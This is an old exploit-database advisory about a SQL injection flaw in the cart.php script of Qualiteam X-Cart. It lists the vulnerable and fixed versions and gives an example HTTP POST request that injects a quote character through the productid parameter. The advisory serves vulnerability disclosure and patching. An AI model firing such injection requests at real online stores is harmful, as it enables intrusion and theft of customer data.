Qualiteam X-Cart 'cart.php' SQL Injection Vulnerab

Posted on 16 March 2010
=======================================================
Qualiteam X-Cart 'cart.php' SQL Injection Vulnerability
=======================================================


Vulnerable:  	 Qualiteam X-Cart 4.0.17
Qualiteam X-Cart 4.0.13
Qualiteam X-Cart 4.0.8
Qualiteam X-Cart 3.5.4
Qualiteam X-Cart 3.5.2
Qualiteam X-Cart 3.5.1
Qualiteam X-Cart 3.5 .0
Qualiteam X-Cart 3.4.12
Qualiteam X-Cart 3.4.11
Qualiteam X-Cart 3.4.3
Qualiteam X-Cart 3.4 .0
Qualiteam X-Cart 3.3.2
Qualiteam X-Cart 3.3 .0
Qualiteam X-Cart 3.2.1
Qualiteam X-Cart 3.2 .0


Not Vulnerable: 	Qualiteam X-Cart 4.0.18 


The following example request is available:

POST /cart.php?mode=add HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://www.example.com/product.php?productid=16&amp;cat=0&amp;bestseller
Cookie: store_language=US; xid=51cac653f7b0dfc3002888369aa343f9
Content-Type: application/x-www-form-urlencoded
Content-Length: 206

product_options%5B142%5D=302&amp;product_options%5B180%5D=353&amp;amount=1&amp;mode=add&amp;productid=16%27&amp;cat=0&amp;page= 


# ~  - [ [ : Inj3ct0r : ] ]
TOP
Malware :

None in database
Last 20
Exploits :

Last 20